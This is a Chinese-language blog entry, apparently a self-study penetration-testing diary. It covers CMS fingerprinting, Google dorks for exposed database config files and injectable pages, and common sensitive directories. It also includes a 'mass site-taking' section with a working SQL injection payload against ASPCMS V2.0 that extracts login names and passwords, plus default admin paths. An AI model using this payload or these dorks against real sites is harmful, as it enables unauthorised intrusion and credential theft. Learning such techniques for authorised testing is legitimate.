Re:从零开始的渗透测试废物自学日记(2021.1.10)

今日学习大纲:

  • web渗透常规操作
  • 批量拿站方法
  • 信息搜集的方式和方法

web渗透常规操作

一.判断网站cms类型

判断目标
1.脚本语言
2.操作系统
3.搭建平台
4.cms厂商
5.管理后台样式
6.robots.txt文件中是否有cms固定网站地址
7.版权信息:拉到底部查看版权信息,有些站点会显示cms内容

工具:
1.awvs
2.云悉指纹识别
3.wwwscan
4.站长工具
5.whatweb

二.网站暴库漏洞
暴库,就是通过一些技术手段或者程序漏洞得到数据库的地址,并将数据非法下载到本地。在得到网站数据库后,就可以获得网站管理密码,以便进行后续渗透。
简单来说,就是通过工具或者直接在网页访问敏感目录的方式下载数据库或者是数据库配置文件。

手工方式:
1.inurl:/inc/conn.asp inurl:/inc+conn.asp to parent directory intext:
2.inurl:/inc/conn.asp
3.inurl:/inc+conn.asp
4.to parent directory
5.利用google来搜索intitle/intext/inurl/site/filetype等
6.搜索域名后缀,常见域名后缀有:com/net/mil/org/info/gov/edu/biz/coop/areo/pro/int/arpa

批量拿站方法

  1. 利用最新公布的0day
    例如最近出现的shiro、st2反序列化漏洞等。

aspcms 0day(依然可用)
搜索关键字:有限公司--Powered by ASPCMS V2.0
/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user

默认后台:
/admin_aspcms/login.asp
/admin/login.asp

2.利用超级sql注入工具或啊D注入工具等批量化sql注入工具拿站
想单个找存在存在注入的点,可以通过 inurl: ?id= 来查找比较容易出现注入的网页,然后手工或者简单检测后利用sqlmap测试注入。

3.利用椰树批量拿站
椰树能进行后台扫描,web漏洞扫描,旁站扫描,批量注入,cms扫描等

信息搜集的方式和方法

利用互联网收集信息

  1. “Google hack”
    site: www.baidu.com
    inurl: admin
    intitle: 后台
    filetype: action
    意义:搜索网址是www.baidu.com,url中带有admin,网站标题中带有后台,文件类型是action的网页

  2. 站长工具
    tool.chinaz.com

  3. 渗透过程中的信息整理
    (1)邮箱
    (2)登录页面
    (3)源码的注释
    (4)网站报错信息
    (5)网站版本信息
    (6)robots.txt
    (7)敏感目录
    (8)员工编号,常用密码
    ......

整站目录结构
asp+access
asp+mssql
asp+mysql
php+mysql
...
PS:网站是由源码构成的,目录是为了网站管理员方便管理源码而把特殊页面的源码集中保存而产生的。

常见网站目录:
1.admin(网站后台目录)
2.news(新闻目录)
3.database(db)(数据库目录)
4.upload(上传文件目录)
5.img(网站所用图片目录)
6.manager(网站后台目录)
......

常见敏感文件名称:
1.config(数据库连接所用用户名、密码)
2.conn(数据库具体地址)
3.setup(网站安装文件)
4.install(网站安装文件)(网站安装文件可以在我们无法成功拿到网站权限的情况下,重装网站,拿到网站的权限【操作危险性很高,授权情况下也不要轻易使用】)
......

常见的数据库
1.access
2.mssql
3.mysql
4.oracle
5.db2
6.postgresql

posted @ 2021-01-11 00:00  小明-o3rr0r  阅读(454)  评论(0编辑  收藏  举报